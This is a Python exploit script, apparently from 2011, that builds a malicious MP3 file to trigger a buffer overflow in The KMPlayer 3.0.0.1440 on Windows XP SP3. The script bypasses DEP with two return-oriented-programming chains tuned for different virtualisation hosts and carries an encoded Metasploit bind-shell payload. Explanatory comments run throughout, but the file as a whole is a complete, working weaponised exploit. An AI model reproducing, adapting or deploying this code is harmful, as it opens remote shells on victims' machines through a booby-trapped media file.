#!/usr/bin/python
#
# The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#
# Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
#
# 06 Jun 11
#
# Cobbled together by dookie and ronin
#
# This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
# In our testing environments, there were 2 separate offsets. One offset
# applies to VMs running on Xen and VMware workstation for Linux. The
# second offset applies to ESXi and VMware Fusion.
import os
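# Name of the crafted media file this script writes to the current directory.
evilfile = "km_pwn.mp3"

# Leading bytes of the file, placed before the overflow padding.
# The data contains recognisable ID3v2 frame identifiers (TIT2, TCON, PRIV,
# TPUB, TPE2, TCOM) with many surrounding bytes altered, and it does not start
# with the usual "ID3" magic - presumably a mutated tag taken from a real MP3.
# The literal was split across two physical lines in this listing, which is not
# valid inside a single-quoted string; it is written here as two adjacent
# literals so the bytes stay exactly as listed.
head = (
    "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66"
    "\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"
)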
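# Padding between the file header and the first chain's saved-return-address
# overwrite (see the concatenation order in `sploit`).
# The four assignments were collapsed onto one physical line in this listing,
# which is not valid Python; they are restored one per line, values unchanged.
cruft = "\x85" * 3162

# NOP run placed directly before the shellcode in the first chain's layout.
nops = "\x90" * 28
# The last byte gets decremented in rop2 while pointing EAX at the shellcode:
# the ADD EAX,84 gadget also executes DEC DWORD PTR DS:[EAX], so this dword is
# written as 0x90909091 and becomes 0x90909090 once decremented.
nops += "\x91\x90\x90\x90"
nops += "\x90" * 20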
# Payload bytes copied into executable memory by both chains.
# Provenance, as recorded by the authors:
#   #shellcode = "\xcc" * 368 # Size of bind shell   (breakpoint placeholder used while testing)
#   root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
#   [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# Per that note this is an encoded Metasploit bind-shell payload, so the
# observable effect on a host is the media-player process opening a listening
# TCP socket. The encoder output avoids the bytes 0x00, 0x0a and 0x0d.
shellcode = "".join((
    "\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1",
    "\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33",
    "\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45",
    "\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49",
    "\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05",
    "\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca",
    "\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60",
    "\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf",
    "\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73",
    "\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9",
    "\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0",
    "\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde",
    "\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f",
    "\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9",
    "\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53",
    "\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0",
    "\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47",
    "\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6",
    "\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf",
    "\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f",
    "\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3",
    "\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99",
    "\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4",
    "\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08",
    "\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7",
))
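##################### ROP Chain for VMware Workstation (Linux) and Xen #####################
# The statements below were collapsed onto one line in this listing, so every
# assignment after the first `#` was swallowed by a comment; they are restored
# one per line with the byte values unchanged.
#
# Every value here is an absolute virtual address tied to a specific module
# build (the trailing comments name the module). Nothing is resolved at run
# time, so the chain only lines up where those modules load at these bases.

eip = "\x71\x14\x40\x00"    # 00401471 RETN Pivot to the stack
toesp = "\x42" * 4

# Stack frame for a return into WriteProcessMemory. The call copies the
# shellcode from the non-executable stack into a code region of a loaded DLL,
# which is why DEP on its own does not stop this chain. The return address
# (02451F20) lies 0x10 past the patch address (02451F10), i.e. inside the bytes
# the call has just written. The two placeholder dwords are overwritten at run
# time by the gadgets in rop2.
wpm = "\x13\x22\x80\x7c"    # 7C802213 WriteProcessMemory - XPSP3
wpm += "\x20\x1f\x45\x02"   # 02451F20 in_wm.dll - Return after WPM
wpm += "\xff\xff\xff\xff"   # hProcess (-1, the current-process pseudo-handle)
wpm += "\x10\x1f\x45\x02"   # 02451F10 in_wm.dll - Address to Patch
wpm += "\xbe\xba\xfe\xca"   # lpBuffer placeholder (Shellcode Address)
wpm += "\xce\xfa\xed\xfe"   # nSize placeholder (Shellcode Size)
wpm += "\xc0\x2b\x45\x02"   # 02452BC0 in_wm.dll - Pointer for Written Bytes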
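# Get a copy of ESP into a register.
# (Restored to one statement per line; in this listing the whole line began
# with `#`, so neither rop1 nor junk was ever assigned.)
rop1 = "\x4f\x92\x71\x13"   # 1371924F : {POP} # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
rop1 += "\x41" * 12         # Junk to be popped into ESI, EBP, and EBX

# Junk between the WriteProcessMemory parameters and the next ROP chain.
# The original comment said "VirtualProtect", but the parameter block that
# precedes this in the final buffer is the WriteProcessMemory frame (wpm).
# That 28-byte frame plus these 52 bytes make 80 = 0x50, the distance skipped
# by the ADD ESP,50 in the gadget above.
junk = "\x61" * 52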
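# Second stage of the first chain: computes the shellcode address and size at
# run time, writes them into the two placeholders of the WriteProcessMemory
# frame, then pivots ESP onto that frame.
# In this listing each group of statements was collapsed onto a line starting
# with `#`, so `rop2` was never initialised; the statements are restored one
# per line with the byte values unchanged.

# Put a copy of the saved ESP from EDI into EAX
rop2 = "\x75\x66\x8a\x5b"   # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\x41" * 8          # Compensate for the RETN 8 in rop1
# Increase EAX to point at our shellcode
rop2 += "\x37\x75\x37\x02"  # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
rop2 += "\x37\x75\x37\x02"  # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)

# Write the address of the shellcode into the lpBuffer placeholder
# First need to put EAX in a safe spot then juggle around EDI to get it to ESI
rop2 += "\xc3\x87\xec\x76"  # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\x75\x66\x8a\x5b"  # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\xd8\xc3\x3c\x76"  # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)
rop2 += "\xc3\x87\xec\x76"  # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\xbe\x9c\xca\x76"  # 76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
rop2 += "\x41" * 4          # Junk to be popped into ESI

# Get the initial ESP value back into ESI
rop2 += "\xe6\x57\x01\x15"  # 150157E6 : {POP} # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
rop2 += "\x41" * 8          # Junk to be popped into EBX and ECX

# Get the initial ESP value back into ESI
rop2 += "\xd8\xc3\x3c\x76"  # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)

# Zero EAX and set it to the shellcode size (0x200)
rop2 += "\xc0\x11\x37\x02"  # 023711C0 : # XOR EAX,EAX # RETN (in_mp4.dll)
rop2 += "\xe9\x0b\x44\x02"  # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4          # Junk to be popped into EBP
rop2 += "\xe9\x0b\x44\x02"  # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4          # Junk to be popped into EBP

# Write the shellcode size into the nSize placeholder
rop2 += "\x3f\xcf\x9e\x7c"  # 7C9ECF3F : {POP} # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
rop2 += "\x41" * 8          # Junk to be popped into ESI and EBP

# Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
rop2 += "\x41\x15\x5d\x77"  # 775D1541 : # SUB EAX,4 # RETN (ole32.dll)
rop2 += "\x41" * 4          # presumably compensates for the RETN 4 in the shell32.dll gadget above
rop2 += "\x51\xeb\x43\x02"  # 0243EB51 : # ADD EAX,0C # RETN (in_wm.dll)
rop2 += "\xce\x05\x42\x02"  # 024205CE : {POP} # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
rop2 += "\x41" * 4          # Junk to be popped into ESI

# Trailing padding after the chain.
rop2 += "\x41" * 32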
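############################# ROP Chain for VMware Fusion and ESXi ############################

###############################################################################################
## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
###############################################################################################
# In this listing the statements below sat on a single line beginning with `#`,
# so jmp_value and rop_1 were never assigned; they are restored one per line
# with the byte values unchanged. As in the first chain, every gadget address
# is a fixed virtual address in the module named next to it.

#put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee
# NOTE(review): the literal below is 0x000038F0 (little-endian), not the 0x39EE
# quoted in the author's note above.
jmp_value = "\xf0\x38\x00\x00"

rop_1 = "\x46"*4
#0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) **
rop_1 += "\x2c\x80\x44\x77"
#0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) **
rop_1 += "\x75\x66\x8a\x5b"
#0x7C926021 : {POP} # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll) **
rop_1 += "\x21\x60\x92\x7c"
rop_1 += "\x50" * 8     # consumed by the POP ESI / POP EBP in the gadget above
#0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) **
rop_1 += "\x09\x15\x45\x7e"
###############################################################################################

# Padding placed in front of rop_2 inside the large buffer.
filler_a1 = "\x41"*360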
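###############################################################################################
## ROP_2 = all about the shell
###############################################################################################
# Same approach as the first chain, built from gadgets in OS DLLs only: save
# the stack pointer, fill in the two placeholders of an embedded
# WriteProcessMemory frame at run time, then pivot ESP onto that frame.
# In this listing every group of statements was collapsed onto a line starting
# with `#`, so `rop_2` was never assigned; the statements are restored one per
# line and the byte values are reproduced exactly as listed.

######### SAVING STACKPOINTERS #################################################################
#0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) **
rop_2 = "\x2c\x80\x44\x77"
#0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) **
rop_2 += "\x75\x66\x8a\x5b"
#0x5B8A9F1E : # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll) **
rop_2 += "\x1e\x9f\x8a\x5b"
rop_2 += "\x43\x43\x43\x43"

#WriteProcessMemory construct with the two placeholders we need to generate on the fly
###############################################################################################
rop_2 += "\x13\x22\x80\x7c" #WriteProcMem - XPSP3
rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target (used here as the return address)
rop_2 += "\xff\xff\xff\xff" #hProcess (-1, the current-process pseudo-handle)
rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address)
rop_2 += "\xce\xfa\xed\xfe" #nSize placeholder (Shellcode Size)
rop_2 += "\10\x20\x98\x7c" #writeable location in ntdll
###############################################################################################

######### FIRST PARAM - lpBuffer placeholder (Shellcode Address) ###############################
#gadgets (plus various paddings) used to construct the memory address which will point to our shellcode
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x44" * 40
#0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44" *32
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44"*4
#0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) **
rop_2 += "\x8d\xda\x45\x7e"
#0x77DD994E : # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll) **
rop_2 += "\x4e\x99\xdd\x77"
#0x7C910C66 : # XCHG EAX,ESI # RETN 2 (ntdll.dll) **
rop_2 += "\x66\x0c\x91\x7c"
#padding
rop_2 += "\x44" * 2
#0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) **
rop_2 += "\x8d\xda\x45\x7e"
#padding
rop_2 += "\x44"*2
#0x76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) **
rop_2 += "\xbe\x9c\xca\x76"
###############################################################################################

######### SIZE PARAM - nSize placeholder (Shellcode Size) ######################################
#gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes)
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x47" *4
#0x775D156E : # PUSH EAX # POP ESI # RETN (ole32.dll) **
rop_2 += "\x6e\x15\x5d\x77"
#0x7E433785 : # XOR EAX,EAX # RETN 4 (USER32.dll) **
rop_2 += "\x85\x37\x43\x7e"
#0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*8
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*4
#0x75D0AA2E : # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN (mlang.dll) **
rop_2 += "\x2e\xaa\xd0\x75"
###############################################################################################

######### Realigning EAX to point to WPM and setting ESP to it #################################
rop_2 += "\x50" * 4
#0x76CAF118 : # ADD EAX,0C # RETN (IMAGEHLP.dll) **
rop_2 += "\x18\xf1\xca\x76"
#0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) **
rop_2 += "\x09\x15\x45\x7e"
rop_2 += "\x43"*316
###############################################################################################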
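##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
# Both assignments sat on a single line beginning with `#` in this listing and
# were therefore never executed; restored one per line, values unchanged.

#slide into the shell
nops_7 = "\x90"*56
#after the shell junk
filler_a2 = "\x42" * (3200)
###############################################################################################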
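############################# PUTTING IT TOGETHER #############################################
# Assembles the second (VMware Fusion / ESXi) layout. The three assignments sat
# on a single line beginning with `#` in this listing; restored one per line.
#
# Large buffer: padding, rop_2, NOP run, shellcode, trailing junk.
filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2
#small buffer filler
filler_b = "\x44" * (95)
#the whole shebang (ronin's version)
# Order: large buffer, the value rop_1's first gadgets subtract from ESP, the
# same RETN address used as `eip` by the first chain, rop_1, then padding.
filler = filler_a+jmp_value+eip+rop_1+filler_b
###############################################################################################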
# Final file contents, in order: mutated tag header, padding up to the saved
# return address, the first chain (eip .. shellcode), and then `filler`, which
# carries the complete second chain. One file therefore holds both layouts the
# header comment describes.
sploit = "".join((
    head,
    cruft,
    eip,
    toesp,
    rop1,
    wpm,
    junk,
    rop2,
    nops,
    shellcode,
    filler,
))
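# Write the assembled buffer to `evilfile` in the current directory.
# The three statements were collapsed onto one line in this listing (a syntax
# error); they are restored here, and the context manager closes the handle
# even if the write raises.
# NOTE(review): the buffer is built from plain str literals, which are byte
# strings only on Python 2 - presumably the intended interpreter; the original
# text-mode "w" is kept unchanged.
with open(evilfile, "w") as crashy:
    crashy.write(sploit)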